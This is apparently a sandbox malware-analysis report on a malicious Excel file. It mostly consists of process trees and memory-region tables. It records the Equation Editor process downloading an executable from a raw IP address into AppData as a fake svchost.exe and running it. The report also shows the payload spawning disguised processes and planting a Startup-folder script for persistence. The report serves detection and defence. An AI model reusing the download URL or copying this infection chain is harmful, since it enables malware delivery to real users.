0d4e21ce...5b6c

Process Overview

»

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x8fc	Analysis Target	Medium	excel.exe	"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"	-
#2	0xb50	RPC Server	Medium	eqnedt32.exe	"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding	#1
#4	0xbcc	Child Process	Medium	svchost.exe	"C:\Users\aETAdzjz\AppData\Roaming\svchost.exe"	#2
#6	0x818	Child Process	Medium	document.exe	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe" 1 "C:\Users\aETAdzjz\AppData\Roaming\svchost.exe" 1159BD3	#4
#7	0x81c	Child Process	Medium	document.exe	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"	#4
#8	0xa38	Child Process	Medium	document.exe	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"	#7
#9	0xa68	Child Process	Medium	document.exe	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe" 2 2616 18220554	#7
#10	0xabc	Child Process	Medium	iexplore.exe	C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe	#8
#11	0x35c	Child Process	Medium	iexplore.exe	C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe	#8
#12	0xb6c	Child Process	Medium	document.exe	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"	#9
#13	0x568	Autostart	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs"	-
#14	0x6ec	Child Process	Medium	document.exe	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"	#13

Process #1: excel.exe

0

»

Information	Value
ID	#1
File Name	c:\program files\microsoft office\root\office16\excel.exe
Command Line	"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:18, Reason: Analysis Target
Unmonitor	End Time: 00:05:21, Reason: Terminated by Timeout
Monitor Duration	00:04:03
Remark	No high level activity detected in monitored regions

OS Process Information

»

Information	Value
PID	0x8fc
Parent PID	0x39c (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AE8 0x AE4 0x AE0 0x ADC 0x AAC 0x AA8 0x A48 0x A40 0x A10 0x A0C 0x A04 0x A00 0x 9A0 0x 990 0x 98C 0x 988 0x 978 0x 970 0x 96C 0x 968 0x 964 0x 960 0x 940 0x 920 0x 91C 0x 918 0x 914 0x 910 0x 90C 0x 908 0x 900 0x AF8 0x AFC 0x B10 0x B14 0x 810

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x00020fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rw	-
pagefile_0x00000000000e0000	0x000e0000	0x000e0fff	Pagefile Backed Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	rw	-
pagefile_0x00000000001f0000	0x001f0000	0x001f6fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000200000	0x00200000	0x00201fff	Pagefile Backed Memory	rw	-
private_0x0000000000210000	0x00210000	0x00210fff	Private Memory	rw	-
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	rw	-
pagefile_0x0000000000230000	0x00230000	0x00232fff	Pagefile Backed Memory	r	-
private_0x0000000000240000	0x00240000	0x0024ffff	Private Memory	-	-
pagefile_0x0000000000250000	0x00250000	0x00252fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000260000	0x00260000	0x00262fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000270000	0x00270000	0x00272fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000280000	0x00280000	0x00282fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000290000	0x00290000	0x00292fff	Pagefile Backed Memory	r	-
pagefile_0x00000000002a0000	0x002a0000	0x002a1fff	Pagefile Backed Memory	r	-
private_0x00000000002b0000	0x002b0000	0x003affff	Private Memory	rw	-
private_0x00000000003b0000	0x003b0000	0x004affff	Private Memory	rw	-
pagefile_0x00000000004b0000	0x004b0000	0x004b1fff	Pagefile Backed Memory	r	-
private_0x00000000004c0000	0x004c0000	0x004c0fff	Private Memory	rw	-
private_0x00000000004d0000	0x004d0000	0x0050ffff	Private Memory	rw	-
private_0x0000000000510000	0x00510000	0x0051ffff	Private Memory	rw	-
private_0x0000000000520000	0x00520000	0x0052ffff	Private Memory	rw	-
pagefile_0x0000000000530000	0x00530000	0x00530fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000540000	0x00540000	0x00541fff	Pagefile Backed Memory	r	-
index.dat	0x00550000	0x0055bfff	Memory Mapped File	rw	-
index.dat	0x00560000	0x00567fff	Memory Mapped File	rw	-
private_0x0000000000570000	0x00570000	0x0057ffff	Private Memory	rw	-
pagefile_0x0000000000580000	0x00580000	0x00707fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000710000	0x00710000	0x00890fff	Pagefile Backed Memory	r	-
pagefile_0x00000000008a0000	0x008a0000	0x01c9ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01ca0000	0x01f6efff	Memory Mapped File	r	-
pagefile_0x0000000001f70000	0x01f70000	0x02362fff	Pagefile Backed Memory	r	-
private_0x0000000002370000	0x02370000	0x0246ffff	Private Memory	rw	-
private_0x0000000002470000	0x02470000	0x0266ffff	Private Memory	rw	-
index.dat	0x02670000	0x0267ffff	Memory Mapped File	rw	-
pagefile_0x0000000002680000	0x02680000	0x02680fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002690000	0x02690000	0x02690fff	Pagefile Backed Memory	r	-
pagefile_0x00000000026a0000	0x026a0000	0x026a0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000026b0000	0x026b0000	0x026b0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000026c0000	0x026c0000	0x026c4fff	Pagefile Backed Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x026d0fff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x0275ffff	Private Memory	rw	-
pagefile_0x0000000002760000	0x02760000	0x0283efff	Pagefile Backed Memory	r	-
private_0x0000000002840000	0x02840000	0x0293ffff	Private Memory	rw	-
pagefile_0x0000000002940000	0x02940000	0x02941fff	Pagefile Backed Memory	r	-
private_0x0000000002950000	0x02950000	0x02950fff	Private Memory	rw	-
private_0x0000000002960000	0x02960000	0x02960fff	Private Memory	rw	-
private_0x0000000002970000	0x02970000	0x02970fff	Private Memory	rw	-
private_0x0000000002980000	0x02980000	0x02980fff	Private Memory	rw	-
private_0x0000000002990000	0x02990000	0x02990fff	Private Memory	rw	-
private_0x00000000029a0000	0x029a0000	0x02a9ffff	Private Memory	rw	-
pagefile_0x0000000002aa0000	0x02aa0000	0x02aa1fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002ab0000	0x02ab0000	0x02ab0fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002ac0000	0x02ac0000	0x02ac0fff	Pagefile Backed Memory	rw	-
private_0x0000000002ad0000	0x02ad0000	0x02bcffff	Private Memory	rw	-
xlintl32.dll	0x02bd0000	0x03c17fff	Memory Mapped File	r	-
kernelbase.dll.mui	0x03c20000	0x03cdffff	Memory Mapped File	rw	-
private_0x0000000003ce0000	0x03ce0000	0x03ce1fff	Private Memory	rw	-
private_0x0000000003cf0000	0x03cf0000	0x03deffff	Private Memory	rw	-
private_0x0000000003df0000	0x03df0000	0x03df0fff	Private Memory	rw	-
private_0x0000000003e00000	0x03e00000	0x03e00fff	Private Memory	rw	-
pagefile_0x0000000003e10000	0x03e10000	0x03e11fff	Pagefile Backed Memory	r	-
private_0x0000000003e20000	0x03e20000	0x03f1ffff	Private Memory	rw	-
private_0x0000000003f20000	0x03f20000	0x0401ffff	Private Memory	rw	-
pagefile_0x0000000004020000	0x04020000	0x04020fff	Pagefile Backed Memory	r	-
pagefile_0x0000000004030000	0x04030000	0x04031fff	Pagefile Backed Memory	r	-
private_0x0000000004040000	0x04040000	0x0413ffff	Private Memory	rw	-
private_0x0000000004140000	0x04140000	0x041bffff	Private Memory	rw	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x041c0000	0x041dffff	Memory Mapped File	r	-
pagefile_0x00000000041e0000	0x041e0000	0x041e1fff	Pagefile Backed Memory	r	-
private_0x00000000041f0000	0x041f0000	0x041f1fff	Private Memory	rw	-
pagefile_0x0000000004200000	0x04200000	0x04201fff	Pagefile Backed Memory	r	-
private_0x0000000004210000	0x04210000	0x0421ffff	Private Memory	rw	-
private_0x0000000004220000	0x04220000	0x0431ffff	Private Memory	rw	-
private_0x0000000004320000	0x04320000	0x0441ffff	Private Memory	rw	-
c_1255.nls	0x04420000	0x04430fff	Memory Mapped File	r	-
pagefile_0x0000000004440000	0x04440000	0x04441fff	Pagefile Backed Memory	r	-
private_0x0000000004450000	0x04450000	0x04450fff	Private Memory	rw	-
private_0x0000000004460000	0x04460000	0x044dffff	Private Memory	rwx	-
private_0x00000000044e0000	0x044e0000	0x044e0fff	Private Memory	rw	-
private_0x00000000044f0000	0x044f0000	0x044f0fff	Private Memory	rw	-
private_0x0000000004500000	0x04500000	0x04500fff	Private Memory	rw	-
private_0x0000000004510000	0x04510000	0x0460ffff	Private Memory	rw	-
pagefile_0x0000000004610000	0x04610000	0x04a0ffff	Pagefile Backed Memory	r	-
private_0x0000000004a10000	0x04a10000	0x04a21fff	Private Memory	rw	-
private_0x0000000004a30000	0x04a30000	0x04a41fff	Private Memory	rw	-
private_0x0000000004a50000	0x04a50000	0x04a50fff	Private Memory	rw	-
pagefile_0x0000000004a60000	0x04a60000	0x04a61fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000004a70000	0x04a70000	0x04a71fff	Pagefile Backed Memory	rw	-
cversions.2.db	0x04a80000	0x04a83fff	Memory Mapped File	r	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db	0x04a90000	0x04abffff	Memory Mapped File	r	-
cversions.2.db	0x04ac0000	0x04ac3fff	Memory Mapped File	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x04ad0000	0x04b35fff	Memory Mapped File	r	-
pagefile_0x0000000004b40000	0x04b40000	0x04b41fff	Pagefile Backed Memory	r	-
comdlg32.dll.mui	0x04b50000	0x04b5cfff	Memory Mapped File	rw	-
pagefile_0x0000000004b60000	0x04b60000	0x04b61fff	Pagefile Backed Memory	r	-
pagefile_0x0000000004b70000	0x04b70000	0x04b71fff	Pagefile Backed Memory	r	-
private_0x0000000004b80000	0x04b80000	0x04b80fff	Private Memory	rw	-
private_0x0000000004b90000	0x04b90000	0x04b90fff	Private Memory	rw	-
private_0x0000000004ba0000	0x04ba0000	0x04ba0fff	Private Memory	rw	-
private_0x0000000004bb0000	0x04bb0000	0x04caffff	Private Memory	rw	-
segoeui.ttf	0x04cb0000	0x04d2efff	Memory Mapped File	r	-
private_0x0000000004d30000	0x04d30000	0x04d30fff	Private Memory	rw	-
private_0x0000000004d40000	0x04d40000	0x04d40fff	Private Memory	rw	-
private_0x0000000004d50000	0x04d50000	0x04d50fff	Private Memory	rw	-
private_0x0000000004d60000	0x04d60000	0x04d62fff	Private Memory	rw	-
private_0x0000000004d70000	0x04d70000	0x04d72fff	Private Memory	rw	-
private_0x0000000004d80000	0x04d80000	0x04e7ffff	Private Memory	rw	-
private_0x0000000004e80000	0x04e80000	0x0527ffff	Private Memory	rw	-
private_0x0000000005280000	0x05280000	0x0537ffff	Private Memory	rw	-
private_0x0000000005380000	0x05380000	0x05382fff	Private Memory	rw	-
private_0x0000000005390000	0x05390000	0x05392fff	Private Memory	rw	-
private_0x00000000053a0000	0x053a0000	0x053a0fff	Private Memory	rw	-
private_0x00000000053b0000	0x053b0000	0x054affff	Private Memory	rw	-
pagefile_0x00000000054b0000	0x054b0000	0x057f2fff	Pagefile Backed Memory	r	-
tahoma.ttf	0x05800000	0x058aafff	Memory Mapped File	r	-
private_0x00000000058b0000	0x058b0000	0x058b0fff	Private Memory	rw	-
private_0x00000000058c0000	0x058c0000	0x058c0fff	Private Memory	rw	-
private_0x00000000058d0000	0x058d0000	0x0594ffff	Private Memory	rw	-
private_0x0000000005950000	0x05950000	0x05950fff	Private Memory	rw	-
private_0x0000000005960000	0x05960000	0x05960fff	Private Memory	rw	-
private_0x0000000005970000	0x05970000	0x05971fff	Private Memory	rw	-
private_0x0000000005980000	0x05980000	0x05980fff	Private Memory	rw	-
private_0x0000000005990000	0x05990000	0x059d7fff	Private Memory	rw	-
private_0x00000000059e0000	0x059e0000	0x05a27fff	Private Memory	rw	-
private_0x0000000005a30000	0x05a30000	0x05a3ffff	Private Memory	rw	-
private_0x0000000005a40000	0x05a40000	0x05a41fff	Private Memory	rw	-
private_0x0000000005a50000	0x05a50000	0x05a50fff	Private Memory	rw	-
private_0x0000000005a60000	0x05a60000	0x05b5ffff	Private Memory	rw	-
pagefile_0x0000000005b60000	0x05b60000	0x05b61fff	Pagefile Backed Memory	r	-
pagefile_0x0000000005b70000	0x05b70000	0x05b71fff	Pagefile Backed Memory	r	-
cversions.2.db	0x05b80000	0x05b83fff	Memory Mapped File	r	-
private_0x0000000005b90000	0x05b90000	0x05b90fff	Private Memory	rw	-
private_0x0000000005ba0000	0x05ba0000	0x05ba0fff	Private Memory	rw	-
{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db	0x05bb0000	0x05bb0fff	Memory Mapped File	r	-
private_0x0000000005bc0000	0x05bc0000	0x05bc0fff	Private Memory	rw	-
private_0x0000000005bd0000	0x05bd0000	0x05bd0fff	Private Memory	rw	-
private_0x0000000005be0000	0x05be0000	0x05be0fff	Private Memory	rw	-
private_0x0000000005bf0000	0x05bf0000	0x05ceffff	Private Memory	rw	-
private_0x0000000005cf0000	0x05cf0000	0x05cf0fff	Private Memory	rw	-
private_0x0000000005d00000	0x05d00000	0x05d00fff	Private Memory	rw	-
private_0x0000000005d10000	0x05d10000	0x05d10fff	Private Memory	rw	-
private_0x0000000005d20000	0x05d20000	0x05d20fff	Private Memory	rw	-
private_0x0000000005d30000	0x05d30000	0x05e2ffff	Private Memory	rw	-
For performance reasons, the remaining 341 entries are omitted. The remaining entries can be found in flog.txt.

Process #2: eqnedt32.exe

8

1

»

Information	Value
ID	#2
File Name	c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\equation\eqnedt32.exe
Command Line	"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:56, Reason: RPC Server
Unmonitor	End Time: 00:02:28, Reason: Self Terminated
Monitor Duration	00:00:32

OS Process Information

»

Information	Value
PID	0xb50
Parent PID	0x258 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B54 0x B60 0x B6C 0x B74 0x B78 0x B84 0x B88 0x B8C 0x B90 0x B94 0x BC8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x00020fff	Pagefile Backed Memory	r	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	r	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	rw	-
pagefile_0x0000000000230000	0x00230000	0x00230fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000240000	0x00240000	0x00246fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000250000	0x00250000	0x00251fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000260000	0x00260000	0x00260fff	Pagefile Backed Memory	r	-
private_0x0000000000270000	0x00270000	0x002affff	Private Memory	rw	-
private_0x00000000002b0000	0x002b0000	0x002bffff	Private Memory	rw	-
private_0x00000000002c0000	0x002c0000	0x002fffff	Private Memory	rw	-
private_0x0000000000300000	0x00300000	0x0033ffff	Private Memory	rw	-
pagefile_0x0000000000340000	0x00340000	0x00341fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00350000	0x00350fff	Memory Mapped File	r	-
index.dat	0x00350000	0x0035bfff	Memory Mapped File	rw	-
pagefile_0x0000000000360000	0x00360000	0x00361fff	Pagefile Backed Memory	r	-
private_0x0000000000370000	0x00370000	0x0037ffff	Private Memory	rw	-
private_0x0000000000380000	0x00380000	0x003bffff	Private Memory	rw	-
index.dat	0x003c0000	0x003c7fff	Memory Mapped File	rw	-
index.dat	0x003d0000	0x003dffff	Memory Mapped File	rw	-
private_0x00000000003e0000	0x003e0000	0x003e0fff	Private Memory	rw	-
pagefile_0x00000000003e0000	0x003e0000	0x003e0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003f0000	0x003f0000	0x003f0fff	Pagefile Backed Memory	rw	-
eqnedt32.exe	0x00400000	0x0048dfff	Memory Mapped File	rwx	-
pagefile_0x0000000000490000	0x00490000	0x00617fff	Pagefile Backed Memory	r	-
private_0x0000000000620000	0x00620000	0x0065ffff	Private Memory	rw	-
pagefile_0x0000000000660000	0x00660000	0x00660fff	Pagefile Backed Memory	r	-
private_0x0000000000670000	0x00670000	0x006effff	Private Memory	rw	-
pagefile_0x00000000006f0000	0x006f0000	0x00870fff	Pagefile Backed Memory	r	-
private_0x0000000000880000	0x00880000	0x008bffff	Private Memory	rw	-
private_0x00000000008d0000	0x008d0000	0x009cffff	Private Memory	rw	-
pagefile_0x00000000009d0000	0x009d0000	0x01dcffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01dd0000	0x0209efff	Memory Mapped File	r	-
pagefile_0x00000000020a0000	0x020a0000	0x02492fff	Pagefile Backed Memory	r	-
pagefile_0x00000000024a0000	0x024a0000	0x0257efff	Pagefile Backed Memory	r	-
private_0x0000000002580000	0x02580000	0x025bffff	Private Memory	rw	-
c_20127.nls	0x025c0000	0x025d0fff	Memory Mapped File	r	-
private_0x00000000025f0000	0x025f0000	0x0262ffff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x0266ffff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x02a6ffff	Private Memory	rw	-
private_0x0000000002a70000	0x02a70000	0x02b6ffff	Private Memory	rw	-
private_0x0000000002b70000	0x02b70000	0x02c6ffff	Private Memory	rw	-
private_0x0000000002c70000	0x02c70000	0x02d6ffff	Private Memory	rw	-
private_0x0000000002d70000	0x02d70000	0x02e6ffff	Private Memory	rw	-
private_0x0000000002e70000	0x02e70000	0x02eeffff	Private Memory	rw	-
kernelbase.dll.mui	0x02ef0000	0x02faffff	Memory Mapped File	rw	-
private_0x0000000002fb0000	0x02fb0000	0x02feffff	Private Memory	rw	-
private_0x0000000003010000	0x03010000	0x0304ffff	Private Memory	rw	-
staticcache.dat	0x03050000	0x0397ffff	Memory Mapped File	r	-
private_0x0000000003980000	0x03980000	0x03a7ffff	Private Memory	rw	-
private_0x0000000003a80000	0x03a80000	0x03c4ffff	Private Memory	rw	-
private_0x0000000003a80000	0x03a80000	0x03b1ffff	Private Memory	rw	-
private_0x0000000003a80000	0x03a80000	0x03abffff	Private Memory	rw	-
private_0x0000000003ae0000	0x03ae0000	0x03b1ffff	Private Memory	rw	-
private_0x0000000003b20000	0x03b20000	0x03c0ffff	Private Memory	rw	-
private_0x0000000003c10000	0x03c10000	0x03c4ffff	Private Memory	rw	-
private_0x0000000003c50000	0x03c50000	0x03d4ffff	Private Memory	rw	-
private_0x0000000003d50000	0x03d50000	0x03e4ffff	Private Memory	rw	-
private_0x0000000003e50000	0x03e50000	0x03f4ffff	Private Memory	rw	-
private_0x0000000003f50000	0x03f50000	0x040effff	Private Memory	rw	-
private_0x0000000003f50000	0x03f50000	0x0404ffff	Private Memory	rw	-
private_0x00000000040e0000	0x040e0000	0x040effff	Private Memory	rw	-
private_0x00000000040f0000	0x040f0000	0x0428ffff	Private Memory	rw	-
eeintl.dll	0x3de20000	0x3de2dfff	Memory Mapped File	rwx	-
private_0x000000006fe20000	0x6fe20000	0x6fe2ffff	Private Memory	rwx	-
msi.dll	0x74b10000	0x74d4ffff	Memory Mapped File	rwx	-
npmproxy.dll	0x74c80000	0x74c87fff	Memory Mapped File	rwx	-
netprofm.dll	0x74c90000	0x74ce9fff	Memory Mapped File	rwx	-
rasadhlp.dll	0x74cf0000	0x74cf5fff	Memory Mapped File	rwx	-
nlaapi.dll	0x74d00000	0x74d0ffff	Memory Mapped File	rwx	-
mswsock.dll	0x74d10000	0x74d4bfff	Memory Mapped File	rwx	-
wshtcpip.dll	0x74f80000	0x74f84fff	Memory Mapped File	rwx	-
sensapi.dll	0x74f90000	0x74f95fff	Memory Mapped File	rwx	-
rtutils.dll	0x74fa0000	0x74facfff	Memory Mapped File	rwx	-
rasapi32.dll	0x74fb0000	0x75001fff	Memory Mapped File	rwx	-
comctl32.dll	0x75010000	0x751adfff	Memory Mapped File	rwx	-
dwmapi.dll	0x751f0000	0x75202fff	Memory Mapped File	rwx	-
uxtheme.dll	0x75210000	0x7528ffff	Memory Mapped File	rwx	-
api-ms-win-core-synch-l1-2-0.dll	0x75290000	0x75292fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
rasman.dll	0x75350000	0x75364fff	Memory Mapped File	rwx	-
winnsi.dll	0x75370000	0x75376fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75380000	0x7539bfff	Memory Mapped File	rwx	-
dnsapi.dll	0x753a0000	0x753e3fff	Memory Mapped File	rwx	-
rsaenh.dll	0x753f0000	0x7542afff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75430000	0x7543dfff	Memory Mapped File	rwx	-
cryptsp.dll	0x75440000	0x75455fff	Memory Mapped File	rwx	-
comctl32.dll	0x75460000	0x754e3fff	Memory Mapped File	rwx	-
userenv.dll	0x754f0000	0x75506fff	Memory Mapped File	rwx	-
c2r32.dll	0x75510000	0x75688fff	Memory Mapped File	rwx	-
appvisvsubsystems32.dll	0x75690000	0x75847fff	Memory Mapped File	rwx	-
profapi.dll	0x75950000	0x7595afff	Memory Mapped File	rwx	-
cryptbase.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75980000	0x759dffff	Memory Mapped File	rwx	-
sechost.dll	0x759e0000	0x759f8fff	Memory Mapped File	rwx	-
normaliz.dll	0x75a00000	0x75a02fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75a10000	0x75abbfff	Memory Mapped File	rwx	-
urlmon.dll	0x75ac0000	0x75bf5fff	Memory Mapped File	rwx	-
imm32.dll	0x75c00000	0x75c5ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75c60000	0x75cb6fff	Memory Mapped File	rwx	-
ole32.dll	0x75cf0000	0x75e4bfff	Memory Mapped File	rwx	-
msctf.dll	0x75e50000	0x75f1bfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f40000	0x75f85fff	Memory Mapped File	rwx	-
usp10.dll	0x75fa0000	0x7603cfff	Memory Mapped File	rwx	-
clbcatq.dll	0x76040000	0x760c2fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x760d0000	0x761bffff	Memory Mapped File	rwx	-
kernel32.dll	0x76220000	0x7632ffff	Memory Mapped File	rwx	-
crypt32.dll	0x76330000	0x7644cfff	Memory Mapped File	rwx	-
ws2_32.dll	0x76450000	0x76484fff	Memory Mapped File	rwx	-
advapi32.dll	0x76490000	0x7652ffff	Memory Mapped File	rwx	-
oleaut32.dll	0x76720000	0x767aefff	Memory Mapped File	rwx	-
iertutil.dll	0x767e0000	0x769dafff	Memory Mapped File	rwx	-
gdi32.dll	0x76a70000	0x76afffff	Memory Mapped File	rwx	-
shell32.dll	0x76b00000	0x77749fff	Memory Mapped File	rwx	-
msasn1.dll	0x77800000	0x7780bfff	Memory Mapped File	rwx	-
lpk.dll	0x77810000	0x77819fff	Memory Mapped File	rwx	-
user32.dll	0x77820000	0x7791ffff	Memory Mapped File	rwx	-
wininet.dll	0x77920000	0x77a14fff	Memory Mapped File	rwx	-
private_0x0000000077a20000	0x77a20000	0x77b19fff	Private Memory	rwx	-
private_0x0000000077b20000	0x77b20000	0x77c3efff	Private Memory	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
nsi.dll	0x77df0000	0x77df5fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
private_0x000000007ef9e000	0x7ef9e000	0x7efa0fff	Private Memory	rw	-
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	rw	-
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	rw	-
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	rw	-
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	rw	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-
For performance reasons, the remaining 32 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

»

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\aETAdzjz\AppData\Roaming\svchost.exe	693.00 KB	MD5: 7cd1dbbd8457d59274642c9a6e3e60dd SHA1: 3b34e363b79ae598e50f01e1da1523fbd9c2252d SHA256: 0cc3133bbc266693fc23810fb99e57e99b4d1a110f174970aeea79c66d569ce7 SSDeep: 12288:ohSu1Z/EMlJIkTnz6sDsh+zZzuw1aoSqntqtH4qgSBDeiN2:EHzE2Jvi+17wo9nUVgCDeI2		... File Actions Show Properties Download

Modified Files

»

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\aETAdzjz\AppData\Roaming\svchost.exe	693.00 KB	MD5: 7cd1dbbd8457d59274642c9a6e3e60dd SHA1: 3b34e363b79ae598e50f01e1da1523fbd9c2252d SHA256: 0cc3133bbc266693fc23810fb99e57e99b4d1a110f174970aeea79c66d569ce7 SSDeep: 12288:ohSu1Z/EMlJIkTnz6sDsh+zZzuw1aoSqntqtH4qgSBDeiN2:EHzE2Jvi+17wo9nUVgCDeI2		... File Actions Show Properties Download

Threads

Thread 0xb54

8

1

»

Category	Operation	Information	Count	Logfile
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x76234173	1	Fn
Module	Load	module_name = Urlmon, base_address = 0x75ac0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\urlmon.dll, function = URLDownloadToFileW, address_out = 0x75b566f6	1	Fn
URL	Download	url = http://23.249.167.158/file/doc/scvhost.exe, filename = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Module	Load	module_name = Shell32, base_address = 0x76b00000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76b21e46	1	Fn
Process	Create	process_name = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, show_window = SW_SHOWNORMAL	1	Fn
